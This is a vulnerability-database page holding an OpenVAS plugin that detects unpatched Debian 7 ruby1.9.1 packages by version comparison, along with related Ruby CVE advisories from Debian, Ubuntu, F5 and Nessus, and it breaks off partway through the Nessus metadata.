Debian LTS: Security Advisory for ruby1.9.1 (DLA-1114-1)
2018-02-07T00:00:00
ID OPENVAS:1361412562310891114 Type openvas Reporter Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net Modified 2020-01-29T00:00:00
Description
Multiple vulnerabilities were discovered in the Ruby 1.9 interpreter.
CVE-2017-0898
Buffer underrun vulnerability in Kernel.sprintf
CVE-2017-0899
ANSI escape sequence vulnerability
CVE-2017-0900
DoS vulnerability in the query command
CVE-2017-0901
gem installer allows a malicious gem to overwrite arbitrary files
CVE-2017-10784
Escape sequence injection vulnerability in the Basic
authentication of WEBrick
CVE-2017-14033
Buffer underrun vulnerability in OpenSSL ASN1 decode
CVE-2017-14064
Heap exposure vulnerability in generating JSON
# Copyright (C) 2018 Greenbone Networks GmbH
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (C) of the respective author(s)
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
# Registration phase: when the scanner loads the plugin with `description`
# set, only metadata is published and the script exits before any check runs.
if(description)
{
# Greenbone plugin OID; the trailing 891114 mirrors the DLA-1114-1 number.
script_oid("1.3.6.1.4.1.25623.1.0.891114");
script_version("2020-01-29T08:22:52+0000");
# All seven CVEs fixed by the advisory, so findings can be correlated per CVE.
script_cve_id("CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064");
script_name("Debian LTS: Security Advisory for ruby1.9.1 (DLA-1114-1)");
script_tag(name:"last_modification", value:"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)");
script_tag(name:"creation_date", value:"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)");
# Aggregate score: network / no auth / complete C-I-A, i.e. the worst case
# across the bundled CVEs. The individual issues in the summary range from
# DoS (CVE-2017-0900) to arbitrary file overwrite by a malicious gem
# (CVE-2017-0901), so triage per CVE rather than by this single number.
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
# A vendor package update exists; no mitigation-only advice.
script_tag(name:"solution_type", value:"VendorFix");
# Quality of detection: installed-package version comparison, not an active probe.
script_tag(name:"qod_type", value:"package");
# Primary reference: the debian-lts-announce mail for DLA-1114-1.
script_xref(name:"URL", value:"https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html");
# Non-intrusive category: the check only reads an already gathered package list.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
# Needs the SSH package inventory produced by gather-package-list.nasl.
script_dependencies("gather-package-list.nasl");
# Runs only against hosts identified over SSH as Debian 7 (DEB7) with a package
# list available; other releases are out of scope for this DLA.
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB7");
script_tag(name:"affected", value:"ruby1.9.1 on Debian Linux");
# Fixed source version for Wheezy; the package checks below compare against it.
script_tag(name:"solution", value:"For Debian 7 'Wheezy', these problems have been fixed in version
1.9.3.194-8.1+deb7u6.
We recommend that you upgrade your ruby1.9.1 packages.");
script_tag(name:"summary", value:"Multiple vulnerabilities were discovered in the Ruby 1.9 interpreter.
CVE-2017-0898
Buffer underrun vulnerability in Kernel.sprintf
CVE-2017-0899
ANSI escape sequence vulnerability
CVE-2017-0900
DOS vulernerability in the query command
CVE-2017-0901
gem installer allows a malicious gem to overwrite arbitrary files
CVE-2017-10784
Escape sequence injection vulnerability in the Basic
authentication of WEBrick
CVE-2017-14033
Buffer underrun vulnerability in OpenSSL ASN1 decode
CVE-2017-14064
Heap exposure vulnerability in generating JSON");
# NOTE(review): version-based test only. It flags any ruby1.9.1 binary package
# older than the fixed version and does not exercise the listed issues; a
# locally rebuilt package with a different version string would presumably
# not be recognized as fixed -- confirm against isdpkgvuln() semantics.
script_tag(name:"vuldetect", value:"This check tests the installed software version using the apt package manager.");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
# Detection phase.
# Fixed version shipped by DLA-1114-1 for Debian 7 "Wheezy"; every binary
# package built from the ruby1.9.1 source must be at or above it.
fixed_ver = "1.9.3.194-8.1+deb7u6";
target_rls = "DEB7";

# Binary packages produced by the ruby1.9.1 source package on Wheezy.
affected_pkgs = make_list(
  "libruby1.9.1",
  "libruby1.9.1-dbg",
  "libtcltk-ruby1.9.1",
  "ri1.9.1",
  "ruby1.9.1",
  "ruby1.9.1-dev",
  "ruby1.9.1-examples",
  "ruby1.9.1-full",
  "ruby1.9.3"
);

report = "";
foreach pkg_name (affected_pkgs) {
  # isdpkgvuln() (pkg-lib-deb.inc) yields a report fragment when the installed
  # version is older than fixed_ver, and NULL when the package is absent or
  # already at/above the fixed version.
  res = isdpkgvuln(pkg:pkg_name, ver:fixed_ver, rls:target_rls);
  if(!isnull(res)) {
    report += res;
  }
}

if(report != "") {
  # At least one installed package is below the fixed version: report it.
  security_message(data:report);
} else if(__pkg_match) {
  # A package from this source was seen but is already patched; exit 99 tells
  # the scanner "checked, not vulnerable" instead of staying silent.
  exit(99);
}
{"id": "OPENVAS:1361412562310891114", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian LTS: Security Advisory for ruby1.9.1 (DLA-1114-1)", "description": "Multiple vulnerabilities were discovered in the Ruby 1.9 interpreter.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON", "published": "2018-02-07T00:00:00", "modified": "2020-01-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891114", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net", "references": ["https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html"], "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "lastseen": "2020-01-29T20:07:49", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K01730454"]}, {"type": "ubuntu", "idList": ["USN-3553-1", "USN-3528-1", "USN-3439-1", "USN-3685-1"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1114.NASL", "SL_20180228_RUBY_ON_SL7_X.NASL", "EULEROS_SA-2018-1067.NASL", "EULEROS_SA-2019-1407.NASL", "ALA_ALAS-2017-915.NASL", "UBUNTU_USN-3439-1.NASL", "SLACKWARE_SSA_2017-261-03.NASL", "ALA_ALAS-2017-906.NASL", "EULEROS_SA-2018-1066.NASL", "FREEBSD_PKG_95B013799D5211E7A25C471BAFC3262F.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1112-1:73A63", "DEBIAN:DLA-1113-1:5D775", "DEBIAN:DSA-3966-1:856A1", "DEBIAN:DSA-4031-1:AC0D9", 
"DEBIAN:DLA-1421-1:5BC60", "DEBIAN:DLA-1114-1:DA09C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191407", "OPENVAS:1361412562311220181066", "OPENVAS:1361412562310873953", "OPENVAS:1361412562310843791", "OPENVAS:1361412562311220181067", "OPENVAS:1361412562310704031", "OPENVAS:1361412562310873376", "OPENVAS:1361412562311220181248", "OPENVAS:1361412562310843684", "OPENVAS:1361412562310882847"]}, {"type": "slackware", "idList": ["SSA-2017-261-03"]}, {"type": "amazon", "idList": ["ALAS-2017-915", "ALAS-2017-906"]}, {"type": "cve", "idList": ["CVE-2017-14064", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-0898"]}, {"type": "freebsd", "idList": ["95B01379-9D52-11E7-A25C-471BAFC3262F"]}, {"type": "redhat", "idList": ["RHSA-2017:3485", "RHSA-2018:0378", "RHSA-2018:0585", "RHSA-2018:0583"]}, {"type": "centos", "idList": ["CESA-2018:0378"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-0378"]}, {"type": "gentoo", "idList": ["GLSA-201710-01", "GLSA-201710-18"]}, {"type": "fedora", "idList": ["FEDORA:EB90F61CDEB4", "FEDORA:2FE52602F595", "FEDORA:E680D6015E29", "FEDORA:16FA760E0F1F", "FEDORA:605EC60A618F"]}, {"type": "hackerone", "idList": ["H1:209949", "H1:243003", "H1:226335", "H1:212241", "H1:243156", "H1:223363"]}, {"type": "zdt", "idList": ["1337DAY-ID-28426"]}, {"type": "exploitdb", "idList": ["EDB-ID:42611"]}, {"type": "apple", "idList": ["APPLE:HT208937", "APPLE:HT209193"]}], "modified": "2020-01-29T20:07:49", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-01-29T20:07:49", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "1361412562310891114", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU 
General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891114\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_name(\"Debian LTS: Security Advisory for ruby1.9.1 (DLA-1114-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"ruby1.9.1 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been 
fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities were discovered in the Ruby 1.9 interpreter.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libruby1.9.1-dbg\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtcltk-ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ri1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1-dev\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1-examples\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1-full\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.3\", 
ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "naslFamily": "Debian Local Security Checks"}
{"f5": [{"lastseen": "2019-02-07T22:23:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2017-0902", "CVE-2017-0901"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | 
Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:22:00", "published": "2017-09-11T20:16:00", "id": "F5:K01730454", "href": "https://support.f5.com/csp/article/K01730454", "title": "Ruby vulnerabilities CVE-2017-0899, CVE-2017-0900, CVE-2017-0901, and CVE-2017-0902", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:35:30", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "description": "It was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a buffer overrun. \n(CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to execute terminal escape sequences. \n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs. 
\nAn attacker could use this to cause a denial of service. \n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to overwrite any file on the filesystem. \n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to execute arbitrary code. \n(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a denial of service. \n(CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to expose sensitive information. \n(CVE-2017-14064)", "edition": 5, "modified": "2017-10-05T00:00:00", "published": "2017-10-05T00:00:00", "id": "USN-3439-1", "href": "https://ubuntu.com/security/notices/USN-3439-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:31", "bulletinFamily": "unix", "cvelist": ["CVE-2017-10784", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064"], "description": "It was discovered that Ruby incorrectly handled certain terminal emulator \nescape sequences. An attacker could use this to execute arbitrary code via \na crafted user name. This issue only affected Ubuntu 16.04 LTS and Ubuntu 17.10. \n(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain strings. \nAn attacker could use this to cause a denial of service. This issue \nonly affected Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled some generating JSON. \nAn attacker could use this to possible expose sensitive information. \nThis issue only affected Ubuntu 16.04 LTS and Ubuntu 17.10. \n(CVE-2017-14064)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to execute arbitrary code. 
\n(CVE-2017-17790)", "edition": 5, "modified": "2018-01-10T00:00:00", "published": "2018-01-10T00:00:00", "id": "USN-3528-1", "href": "https://ubuntu.com/security/notices/USN-3528-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0903", "CVE-2017-17742", "CVE-2017-10784", "CVE-2017-0902", "CVE-2018-1000074", "CVE-2018-8777", "CVE-2017-14064", "CVE-2017-0901"], "description": "Some of these CVE were already addressed in previous \nUSN: 3439-1, 3553-1, 3528-1. Here we address for \nthe remain releases.\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a buffer overrun. (CVE-2017-0898)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to overwrite any file on the filesystem. \n(CVE-2017-0901)\n\nIt was discovered that Ruby was vulnerable to a DNS hijacking vulnerability. \nAn attacker could use this to possibly force the RubyGems client to download \nand install gems from a server that the attacker controls. (CVE-2017-0902)\n\nIt was discovered that Ruby incorrectly handled certain YAML files. \nAn attacker could use this to possibly execute arbitrary code. (CVE-2017-0903)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to expose sensitive information. \n(CVE-2017-14064)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to execute arbitrary code. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain network requests. \nAn attacker could possibly use this to inject a crafted key into a HTTP \nresponse. (CVE-2017-17742)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could possibly use this to execute arbitrary code. \nThis update is only addressed to ruby2.0. 
(CVE-2018-1000074)\n\nIt was discovered that Ruby incorrectly handled certain network requests. \nAn attacker could possibly use this to cause a denial of service. \n(CVE-2018-8777)", "edition": 5, "modified": "2018-06-13T00:00:00", "published": "2018-06-13T00:00:00", "id": "USN-3685-1", "href": "https://ubuntu.com/security/notices/USN-3685-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:47", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0903", "CVE-2017-0902", "CVE-2017-0901"], "description": "It was discovered that Ruby failed to validate specification names. \nAn attacker could possibly use a maliciously crafted gem to potentially \noverwrite any file on the filesystem. (CVE-2017-0901)\n\nIt was discovered that Ruby was vulnerable to a DNS hijacking vulnerability. \nAn attacker could use this to possibly force the RubyGems client to download \nand install gems from a server that the attacker controls. (CVE-2017-0902)\n\nIt was discovered that Ruby incorrectly handled certain YAML files. An attacker could \nuse this to possibly execute arbitrary code. 
(CVE-2017-0903)", "edition": 5, "modified": "2018-01-31T00:00:00", "published": "2018-01-31T00:00:00", "id": "USN-3553-1", "href": "https://ubuntu.com/security/notices/USN-3553-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:38:41", "description": "Multiple vulnerabilities were discovered in the Ruby 1.9 interpretor.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-27T00:00:00", "title": "Debian DLA-1114-1 : ruby1.9.1 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2017-09-27T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby1.9.1-examples", "p-cpe:/a:debian:debian_linux:ruby1.9.1", "p-cpe:/a:debian:debian_linux:libtcltk-ruby1.9.1", "p-cpe:/a:debian:debian_linux:ruby1.9.1-full", "p-cpe:/a:debian:debian_linux:ruby1.9.3", "p-cpe:/a:debian:debian_linux:ruby1.9.1-dev", "p-cpe:/a:debian:debian_linux:ri1.9.1", "p-cpe:/a:debian:debian_linux:libruby1.9.1-dbg", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:libruby1.9.1"], "id": "DEBIAN_DLA-1114.NASL", "href": "https://www.tenable.com/plugins/nessus/103472", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1114-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103472);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n\n script_name(english:\"Debian DLA-1114-1 : ruby1.9.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered in the Ruby 1.9 interpretor.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/ruby1.9.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.9.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtcltk-ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ri1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-full\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.3\");\n script_set_attribute(attribute:\"cpe\", 